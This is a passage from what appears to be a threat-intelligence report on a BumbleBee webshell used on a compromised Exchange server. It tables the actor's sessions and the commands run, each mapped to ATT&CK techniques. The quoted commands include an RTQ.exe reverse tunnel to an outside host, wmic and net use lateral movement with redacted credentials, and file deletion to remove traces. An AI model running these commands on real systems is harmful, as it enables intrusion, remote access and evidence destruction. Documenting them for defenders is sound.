| 7/27/20 4:52                        | 1            | 193.176.86\[.\]170 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-83.png)   | IJAJGSWXUWVDVMMUHQQ    | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-84.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-85.png)   |
| 7/27/20 10:31                       | 3            | 212.102.52\[.\]134 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-86.png)   | IJAJGSWXUWVDVMMUHQQ    | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-87.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-88.png)   |
| 9/6/20 10:58                        | 0            | 212.102.35\[.\]102 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-89.png)   | IIARASUWFCYUBMI0NA     | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-90.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-91.png)   |
| 9/8/20 6:37                         | 24           | 196.52.84\[.\]30 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-92.png)     | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-93.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-94.png)   |
| 9/8/20 8:22                         | 0            | 185.230.127\[.\]238 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-95.png)  | HKPBNWFKIYLNWUGAHJA    | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-96.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-97.png)   |
| 9/8/20 8:48                         | 0            | 185.230.127\[.\]238 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-98.png)  | \<several unique\>     | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-99.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-100.png)  |
| 9/8/20 11:40                        | 9            | 185.230.127\[.\]238 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-101.png) | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-102.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-103.png) |
| 9/8/20 13:31                        | 1            | 212.102.52\[.\]134 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-104.png)  | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-105.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-106.png) |
| 9/9/20 5:57                         | 3            | 89.238.139\[.\]52 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-107.png)   | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-108.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-109.png) |
| 9/10/20 18:58                       | 24           | 195.181.170\[.\]242 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-110.png) | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-111.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-112.png) |
| 9/12/20 7:13                        | 26           | 89.238.137\[.\]37 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-113.png)   | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-114.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-115.png) |
| 9/12/20 10:29                       | 2            | 212.102.52\[.\]134 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-116.png)  | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-117.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-118.png) |
| 9/15/20 0:04                        | 7            | 92.223.89\[.\]137 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-119.png)   | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-120.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-121.png) |
| 9/15/20 5:28                        | 2            | 85.203.46\[.\]99 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-122.png)    | OWITUR9UOKSZPXDKFBW    | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-123.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-124.png) |
| 9/15/20 10:45                       | 5            | 185.246.208\[.\]197 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-125.png) | YEHIZAWKCLYFMDS9Q      | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-126.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-127.png) |
| 9/15/20 11:24                       | 1            | 77.243.191\[.\]20 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-128.png)   | VOICHQVTFKIDXTCAKA     | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-129.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-130.png) |
| 9/15/20 13:24                       | 4            | 92.223.89\[.\]134 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-131.png)   | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-132.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-133.png) |
| 9/15/20 13:30                       | 6            | 185.246.208\[.\]197 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-134.png) | YEHIZAWKCLYFMDS9Q      | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-135.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-136.png) |
| 9/15/20 14:49                       | 3            | 92.223.89\[.\]136 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-137.png)   | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-138.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-139.png) |
| 9/15/20 15:13                       | 3            | 89.238.139\[.\]52 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-140.png)   | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-141.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-142.png) |
| 9/15/20 15:17                       | 1            | 195.181.170\[.\]243 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-143.png) | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-144.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-145.png) |
| 9/15/20 15:17                       | 1            | 89.238.139\[.\]52 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-146.png)   | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-147.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-148.png) |
| 9/15/20 15:17                       | 7            | 195.181.170\[.\]243 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-149.png) | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-150.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-151.png) |
| 9/15/20 15:24                       | 3            | 89.238.139\[.\]52 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-152.png)   | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-153.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-154.png) |
| 9/15/20 15:24                       | 1            | 195.181.170\[.\]243 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-155.png) | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-156.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-157.png) |
| 9/16/20 5:32                        | 56           | 84.17.55\[.\]68 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-158.png)     | YEHIZAWKCLYFMDS9Q      | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-159.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-160.png) |
| 9/16/20 13:42                       | 6            | 46.246.3\[.\]254 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-161.png)    | INAYIKTWB0WGQOW0SRHWAQ | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-162.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-163.png) |
| 9/16/20 14:33                       | 0            | 46.246.3\[.\]254 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-164.png)    | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-165.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-166.png) |
| 9/16/20 14:34                       | 9            | 46.246.3\[.\]254 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-167.png)    | INAYIKTWB0WGQOW0SRHWAQ | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-168.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-169.png) |
| 9/16/20 15:44                       | 52           | 46.246.3\[.\]253 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-170.png)    | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-171.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-172.png) |
| 9/16/20 16:15                       | 2            | 46.246.3\[.\]254 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-173.png)    | INAYIKTWB0WGQOW0SRHWAQ | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-174.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-175.png) |
| 9/16/20 16:17                       | 13           | 46.246.3\[.\]253 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-176.png)    | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-177.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-178.png) |
| 9/16/20 17:21                       | 1            | 46.246.3\[.\]254 ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-179.png)    | QAFCNW0FN0ENKWGZPEPVW  | ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-180.png) ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2020/12/word-image-181.png) |

^*Table 1. Actor activity using BumbleBee webshell on compromised Exchange server.*^

#### **Commands Executed via BumbleBee on Exchange Server**

|-----------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| **Time (UTC) on 9/16/2020** | **Command Executed**                                                                                                                                                                                                                                                       | **ATT\&CK IDs**                                                                                                                                                                                                                  |
| 13:42:12                    | ping -n 1 -a \<redacted IP #1\>                                                                                                                                                                                                                                            | [T1018](https://attack.mitre.org/techniques/T1018/)                                                                                                                                                                              |
| 13:42:27                    | quser /server:dc.\<redacted root domain\>                                                                                                                                                                                                                                  | [T1087](https://attack.mitre.org/techniques/T1087/)                                                                                                                                                                              |
| 14:27:39                    | ipconfig /all                                                                                                                                                                                                                                                              | [T1016](https://attack.mitre.org/techniques/T1016/)                                                                                                                                                                              |
| 14:27:51                    | W32tm /query /computer:\<redacted IP #1\> /configuration                                                                                                                                                                                                                   | [T1124](https://attack.mitre.org/techniques/T1124/)                                                                                                                                                                              |
| 14:29:06                    | W32tm /query /computer:\<redacted IP #1\> /configuration                                                                                                                                                                                                                   | [T1124](https://attack.mitre.org/techniques/T1124/)                                                                                                                                                                              |
| 14:34:25                    | quser /server:\<redacted IP #1\>                                                                                                                                                                                                                                           | [T1087](https://attack.mitre.org/techniques/T1087/)                                                                                                                                                                              |
| 14:36:57                    | echo y | echo q | echo y | echo q | echo y | echo q |echo y | echo q | echo y | echo q | echo y | echo q | time                                                                                                                                                | [T1124](https://attack.mitre.org/techniques/T1124/)                                                                                                                                                                              |
| 14:37:11                    | echo y | echo q | echo y | echo q | echo y | echo q |echo y | echo q | echo y | echo q | echo y | echo q | time                                                                                                                                                | [T1124](https://attack.mitre.org/techniques/T1124/)                                                                                                                                                                              |
| 14:43:34                    | quser /server:\<redacted IP #1\>                                                                                                                                                                                                                                           | [T1087](https://attack.mitre.org/techniques/T1087/)                                                                                                                                                                              |
| 14:43:53                    | quser /server:\<redacted IP #2\>                                                                                                                                                                                                                                           | [T1087](https://attack.mitre.org/techniques/T1087/)                                                                                                                                                                              |
| 14:49:14                    | quser /server:\<redacted IP #1\>                                                                                                                                                                                                                                           | [T1087](https://attack.mitre.org/techniques/T1087/)                                                                                                                                                                              |
| 14:49:33                    | quser \<redacted username #1\> /server:\<redacted hostname #1\>                                                                                                                                                                                                            | [T1087](https://attack.mitre.org/techniques/T1087/)                                                                                                                                                                              |
| 15:43:13                    | ipconfig /all                                                                                                                                                                                                                                                              | [T1016](https://attack.mitre.org/techniques/T1016/)                                                                                                                                                                              |
| 15:43:21                    | quser /server:\<redacted IP #1\>                                                                                                                                                                                                                                           | [T1087](https://attack.mitre.org/techniques/T1087/)                                                                                                                                                                              |
| 15:44:53                    | dir c:\\windows\\temp\\\*.exe                                                                                                                                                                                                                                              | [T1083](https://attack.mitre.org/techniques/T1083/)                                                                                                                                                                              |
| 15:45:15                    | echo y | c:\\windows\\temp\\RTQ.exe 192.119.110\[.\]194 -C -R 0.0.0.0:8081:\<redacted IP #2\>:3389 -l bor -pw 123321 -P 443                                                                                                                                               | [T1572](https://attack.mitre.org/techniques/T1572/), [T1021.001](https://attack.mitre.org/techniques/T1021/001/)                                                                                                                 |
| 15:45:26                    | whoami                                                                                                                                                                                                                                                                     | [T1033](https://attack.mitre.org/techniques/T1033/)                                                                                                                                                                              |
| 15:45:32                    | echo y | c:\\windows\\temp\\RTQ.exe 192.119.110\[.\]194 -C -R 0.0.0.0:8081:\<redacted IP #2\>:3389 -l bor -pw 123321 -P 443                                                                                                                                               | [T1572](https://attack.mitre.org/techniques/T1572/), [T1021.001](https://attack.mitre.org/techniques/T1021/001/)                                                                                                                 |
| 15:46:11                    | c:\\windows\\temp\\RTQ.exe                                                                                                                                                                                                                                                 | [T1059.003](https://attack.mitre.org/techniques/T1059/003/)                                                                                                                                                                      |
| 15:46:21                    | whoami /priv                                                                                                                                                                                                                                                               | [T1033](https://attack.mitre.org/techniques/T1033/)                                                                                                                                                                              |
| 15:48:15                    | net group "Domain Computers" /domain                                                                                                                                                                                                                                       | [T1069](https://attack.mitre.org/techniques/T1069/)                                                                                                                                                                              |
| 15:48:35                    | ping -n 1 \<redacted hostname #2\>                                                                                                                                                                                                                                         | [T1018](https://attack.mitre.org/techniques/T1018/)                                                                                                                                                                              |
| 15:49:30                    | net use \\\<redacted IP #3\>\\C$ /user:\<redacted domain\>\\\<redacted username #2\> \<redacted password #1\>                                                                                                                                                              | [T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                                                                                      |
| 15:50:22                    | copy c:\\windows\\temp\\RTQ.exe \\\<redacted IP #3\>\\C$\\windows\\temp\\RTQ.exe                                                                                                                                                                                           | [T1560](https://attack.mitre.org/techniques/T1570/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                                  |
| 15:50:28                    | \\\<redacted IP #3\>\\C$\\windows\\temp\\RTQ.exe                                                                                                                                                                                                                           | [T1059.003](https://attack.mitre.org/techniques/T1059/003/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                          |
| 15:51:59                    | wmic /node:"\<redacted IP #3\>" /user:\<redacted domain\>\\\<redacted username #2\> /PASSWORD:\<redacted password #1\> process call create "cmd.exe /c c:\\windows\\temp\\RTQ.exe \>\> C:\\windows\\temp\\r.txt"                                                           | [T1047](https://attack.mitre.org/techniques/T1047/)                                                                                                                                                                              |
| 15:52:22                    | type \\\<redacted IP #3\>\\C$\\windows\\temp\\r.txt                                                                                                                                                                                                                        | [T1039](https://attack.mitre.org/techniques/T1039/),  [T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                          |
| 15:53:36                    | wmic /node:"\<redacted IP #3\>" /user:\<redacted domain\>\\\<redacted username #2\> /PASSWORD:\<redacted password #1\> process call create "cmd.exe /c c:\\windows\\temp\\RTQ.exe 192.119.110\[.\]194 -C -R 0.0.0.0:8082:\<redacted IP #2\>:3389 -l bor -pw 123321 -P 443" | [T1047](https://attack.mitre.org/techniques/T1047/),[T1572](https://attack.mitre.org/techniques/T1572/),  [T1021.001](https://attack.mitre.org/techniques/T1021/001/)                                                      |
| 15:55:14                    | wmic /node:"\<redacted IP #3\>" /user:\<redacted domain\>\\\<redacted username #2\> /PASSWORD:\<redacted password #1\> process call create "cmd.exe /c c:\\windows\\temp\\RTQ.exe 192.119.110\[.\]194 -C -R 0.0.0.0:8084:0.0.0.0:3389 -l bor -pw 123321 -P 443"            | [T1047](https://attack.mitre.org/techniques/T1047/),[T1572](https://attack.mitre.org/techniques/T1572/), [T1021.001](https://attack.mitre.org/techniques/T1021/001/)                                                             |
| 15:56:55                    | del \\\<redacted IP #3\>\\C$:\\windows\\temp\\RTQ.exe                                                                                                                                                                                                                      | [T1070.004](https://attack.mitre.org/techniques/T1070/004/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                          |
| 15:57:03                    | del \\\<redacted IP #3\>\\C$\\windows\\temp\\RTQ.exe                                                                                                                                                                                                                       | [T1070.004](https://attack.mitre.org/techniques/T1070/004/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                          |
| 15:57:10                    | del \\\<redacted IP #3\>\\C$\\windows\\temp\\RTQ.exe /F                                                                                                                                                                                                                    | [T1070.004](https://attack.mitre.org/techniques/T1070/004/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                          |
| 15:58:00                    | wmic /node:"\<redacted IP #3\>" /user:\<redacted domain\>\\\<redacted username #2\> /PASSWORD:\<redacted password #1\> process call create "cmd.exe /c del c:\\windows\\temp\\RTQ.exe /F"                                                                                  | [T1047](https://attack.mitre.org/techniques/T1047/),[T1070.004](https://attack.mitre.org/techniques/T1070/004/)                                                                                                                  |
| 15:58:05                    | wmic /node:"\<redacted IP #3\>" /user:\<redacted domain\>\\\<redacted username #2\> /PASSWORD:\<redacted password #1\> process call create "cmd.exe /c del c:\\windows\\temp\\RTQ.exe"                                                                                     | [T1047](https://attack.mitre.org/techniques/T1047/),[T1070.004](https://attack.mitre.org/techniques/T1070/004/)                                                                                                                  |
| 15:58:19                    | dir \\\<redacted IP #3\>\\C$:\\windows\\temp\\\*.exe                                                                                                                                                                                                                       | [T1083](https://attack.mitre.org/techniques/T1083/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                                  |
| 15:58:25                    | dir \\\<redacted IP #3\>\\C$\\windows\\temp\\\*.exe                                                                                                                                                                                                                        | [T1083](https://attack.mitre.org/techniques/T1083/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                                  |
| 15:58:38                    | dir \\\<redacted IP #3\>\\C$\\windows\\temp\\r.txt                                                                                                                                                                                                                         | [T1083](https://attack.mitre.org/techniques/T1083/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                                  |
| 15:58:43                    | del \\\<redacted IP #3\>\\C$\\windows\\temp\\r.txt                                                                                                                                                                                                                         | [T1070.004](https://attack.mitre.org/techniques/T1070/004/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                          |
| 15:59:25                    | wmic /node:"\<redacted IP #3\>" /user:\<redacted domain\>\\\<redacted username #2\> /PASSWORD:\<redacted password #1\> process call create "cmd.exe /c tasklist \> C:\\windows\\temp\\r.txt"                                                                               | [T1047](https://attack.mitre.org/techniques/T1047/)                                                                                                                                                                              |
| 15:59:29                    | type \\\<redacted IP #3\>\\C$\\windows\\temp\\r.txt                                                                                                                                                                                                                        | [T1039](https://attack.mitre.org/techniques/T1039/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                                  |
| 15:59:48                    | wmic /node:"\<redacted IP #3\>" /user:\<redacted domain\>\\\<redacted username #2\> /PASSWORD:\<redacted password #1\> process call create "cmd.exe /c taskkill /IM "RTQ.exe" /F"                                                                                          | [T1047](https://attack.mitre.org/techniques/T1047/)                                                                                                                                                                              |
| 15:59:55                    | dir c:\\windows\\temp\\\*.exe                                                                                                                                                                                                                                              | [T1083](https://attack.mitre.org/techniques/T1083/)                                                                                                                                                                              |
| 15:59:58                    | dir \\\<redacted IP #3\>\\C$:\\windows\\temp\\\*.exe                                                                                                                                                                                                                       | [T1083](https://attack.mitre.org/techniques/T1083/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                                  |
| 16:00:04                    | dir \\\<redacted IP #3\>\\C$\\windows\\temp\\\*.exe                                                                                                                                                                                                                        | [T1083](https://attack.mitre.org/techniques/T1083/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                                  |
| 16:00:09                    | del \\\<redacted IP #3\>\\C$\\windows\\temp\\\*.exe                                                                                                                                                                                                                        | [T1083](https://attack.mitre.org/techniques/T1083/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                                  |
| 16:00:14                    | dir \\\<redacted IP #3\>\\C$\\windows\\temp\\\*.exe                                                                                                                                                                                                                        | [T1083](https://attack.mitre.org/techniques/T1083/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                                  |
| 16:00:24                    | del \\\<redacted IP #3\>\\C$\\windows\\temp\\r.txt                                                                                                                                                                                                                         | [T1070.004](https://attack.mitre.org/techniques/T1070/004/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                          |
| 16:00:29                    | net use \* /DELETE /y                                                                                                                                                                                                                                                      | [T1070.004](https://attack.mitre.org/techniques/T1070/004/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                          |
| 16:02:48                    | powershell -c "Test-NetConnection -ComputerName \<redacted IP #2\> -Port 80 -InformationLevel "Detailed"                                                                                                                                                                   | [T1046](https://attack.mitre.org/techniques/T1046/),[T1059.001](https://attack.mitre.org/techniques/T1059/001/)                                                                                                                  |
| 16:04:36                    | powershell -c "Test-NetConnection -ComputerName \<redacted IP #2\> -Port 3389 -InformationLevel "Detailed"                                                                                                                                                                 | [T1046](https://attack.mitre.org/techniques/T1046/),[T1059.001](https://attack.mitre.org/techniques/T1059/001/)                                                                                                                  |
| 16:07:23                    | powershell -c "Test-NetConnection -ComputerName \<redacted IP #2\> -Port 389 -InformationLevel "Detailed"                                                                                                                                                                  | [T1046](https://attack.mitre.org/techniques/T1046/),[T1059.001](https://attack.mitre.org/techniques/T1059/001/)                                                                                                                  |
| 16:07:55                    | quser /server:\<redacted IP #1\>                                                                                                                                                                                                                                           | [T1087](https://attack.mitre.org/techniques/T1087/)                                                                                                                                                                              |
| 16:08:42                    | echo y | c:\\windows\\temp\\RTQ.exe 192.119.110\[.\]194 -C -R 0.0.0.0:8081:\<redacted IP #1\>:3389 -l bor -pw 123321 -P 443                                                                                                                                               | [T1572](https://attack.mitre.org/techniques/T1572/), [T1021.001](https://attack.mitre.org/techniques/T1021/001/)                                                                                                                 |
| 16:09:03                    | wmic /node:"127.0.0.1" /user:administrator /PASSWORD:"\<redacted password #2\>" process call create "cmd.exe /c whoami"                                                                                                                                                    | [T1047](https://attack.mitre.org/techniques/T1047/),[T1033](https://attack.mitre.org/techniques/T1033/)                                                                                                                          |
| 16:09:15                    | ipconfig/all                                                                                                                                                                                                                                                               | [T1016](https://attack.mitre.org/techniques/T1016/)                                                                                                                                                                              |
| 16:09:35                    | wmic /node:"Exchange" /user:administrator /PASSWORD:"\<redacted password #2\>" process call create "cmd.exe /c whoami"                                                                                                                                                     | [T1047](https://attack.mitre.org/techniques/T1047/),[T1033](https://attack.mitre.org/techniques/T1033/)                                                                                                                          |
| 16:10:35                    | net use \\\<redacted IP #1\>\\C$ /user:\<redacted domain\>\\\<redacted username #2\> \<redacted password #1\>                                                                                                                                                              | [T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                                                                                      |
| 16:10:45                    | quser /server:\<redacted IP #4\>                                                                                                                                                                                                                                           | [T1087](https://attack.mitre.org/techniques/T1087/)                                                                                                                                                                              |
| 16:13:17                    | ipconfig/all                                                                                                                                                                                                                                                               | [T1016](https://attack.mitre.org/techniques/T1016/)                                                                                                                                                                              |
| 16:13:27                    | wmic /node:"\<redacted IP #1\>" /user:\<redacted domain\>\\\<redacted username #2\> /PASSWORD:\<redacted password #1\> process call create "cmd.exe /c c:\\windows\\temp\\RTQ.exe whoami"                                                                                  | [T1047](https://attack.mitre.org/techniques/T1047/),[T1033](https://attack.mitre.org/techniques/T1033/)                                                                                                                          |
| 16:14:20                    | type \\\<redacted IP #1\>\\C$\\windows\\temp\\w.txt                                                                                                                                                                                                                        | [T1039](https://attack.mitre.org/techniques/T1039/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                                  |
| 16:14:30                    | dir \\\<redacted IP #1\>\\C$\\windows\\temp\\\*.txt                                                                                                                                                                                                                        | [T1083](https://attack.mitre.org/techniques/T1083/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                                  |
| 16:14:56                    | wmic /node:"\<redacted IP #1\>" /user:\<redacted domain\>\\\<redacted username #2\> /PASSWORD:\<redacted password #1\> process call create "cmd.exe /c tasklist \> c:\\windows\\temp\\ww.txt"                                                                              | [T1047](https://attack.mitre.org/techniques/T1047/)                                                                                                                                                                              |
| 16:15:28                    | dir \\\<redacted IP #1\>\\c$\\windows\\temp\\\*txt                                                                                                                                                                                                                         | [T1083](https://attack.mitre.org/techniques/T1083/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                                  |
| 16:15:36                    | type \\\<redacted IP #1\>\\c$\\windows\\temp\\ww.txt                                                                                                                                                                                                                       | [T1039](https://attack.mitre.org/techniques/T1039/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                                  |
| 16:17:54                    | powershell -c Test-NetConnection -ComputerName \<redacted IP #1\> -Port 3389                                                                                                                                                                                               | [T1046](https://attack.mitre.org/techniques/T1046/),[T1059.001](https://attack.mitre.org/techniques/T1059/001/)                                                                                                                  |
| 16:19:28                    | powershell -c Test-NetConnection -ComputerName \<redacted IP #2\> -Port 3389                                                                                                                                                                                               | [T1046](https://attack.mitre.org/techniques/T1046/),[T1059.001](https://attack.mitre.org/techniques/T1059/001/)                                                                                                                  |
| 16:19:32                    | wmic /node:"\<redacted IP #1\>" /user:\<redacted domain\>\\\<redacted username #2\> /PASSWORD:\<redacted password #1\> process call create "cmd /c powershell -c Test-NetConnection -ComputerName \<redacted IP #2\> -Port 3389 \> c:\\windows\\temp\\r.txt"               | [T1046](https://attack.mitre.org/techniques/T1046/),[T1047](https://attack.mitre.org/techniques/T1047/),[T1059.001](https://attack.mitre.org/techniques/T1059/001/), [T1021.001](https://attack.mitre.org/techniques/T1021/001/) |
| 16:20:00                    | type \\\<redacted IP #1\>\\C$\\windows\\temp\\r.txt                                                                                                                                                                                                                        | [T1039](https://attack.mitre.org/techniques/T1039/),[T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                                  |
| 16:20:34                    | ping -n 1 -a \<redacted IP #2\>                                                                                                                                                                                                                                            | [T1018](https://attack.mitre.org/techniques/T1018/)                                                                                                                                                                              |
| 16:21:29                    | wmic /node:"\<redacted IP #2\>" /user:administrator /PASSWORD:"\<redacted password #2\>" process call create "cmd.exe /c whoami"                                                                                                                                           | [T1047](https://attack.mitre.org/techniques/T1047/),[T1033](https://attack.mitre.org/techniques/T1033/)                                                                                                                          |
| 16:22:06                    | wmic /node:"\<redacted IP #2\>" /user:administrator /PASSWORD:"\<redacted password #2\>" process call create "cmd.exe /c whoami"                                                                                                                                           | [T1047](https://attack.mitre.org/techniques/T1047/),[T1033](https://attack.mitre.org/techniques/T1033/)                                                                                                                          |
| 16:22:59                    | net use                                                                                                                                                                                                                                                                    | [T1021.002](https://attack.mitre.org/techniques/T1021/002/)                                                                                                                                                                      |
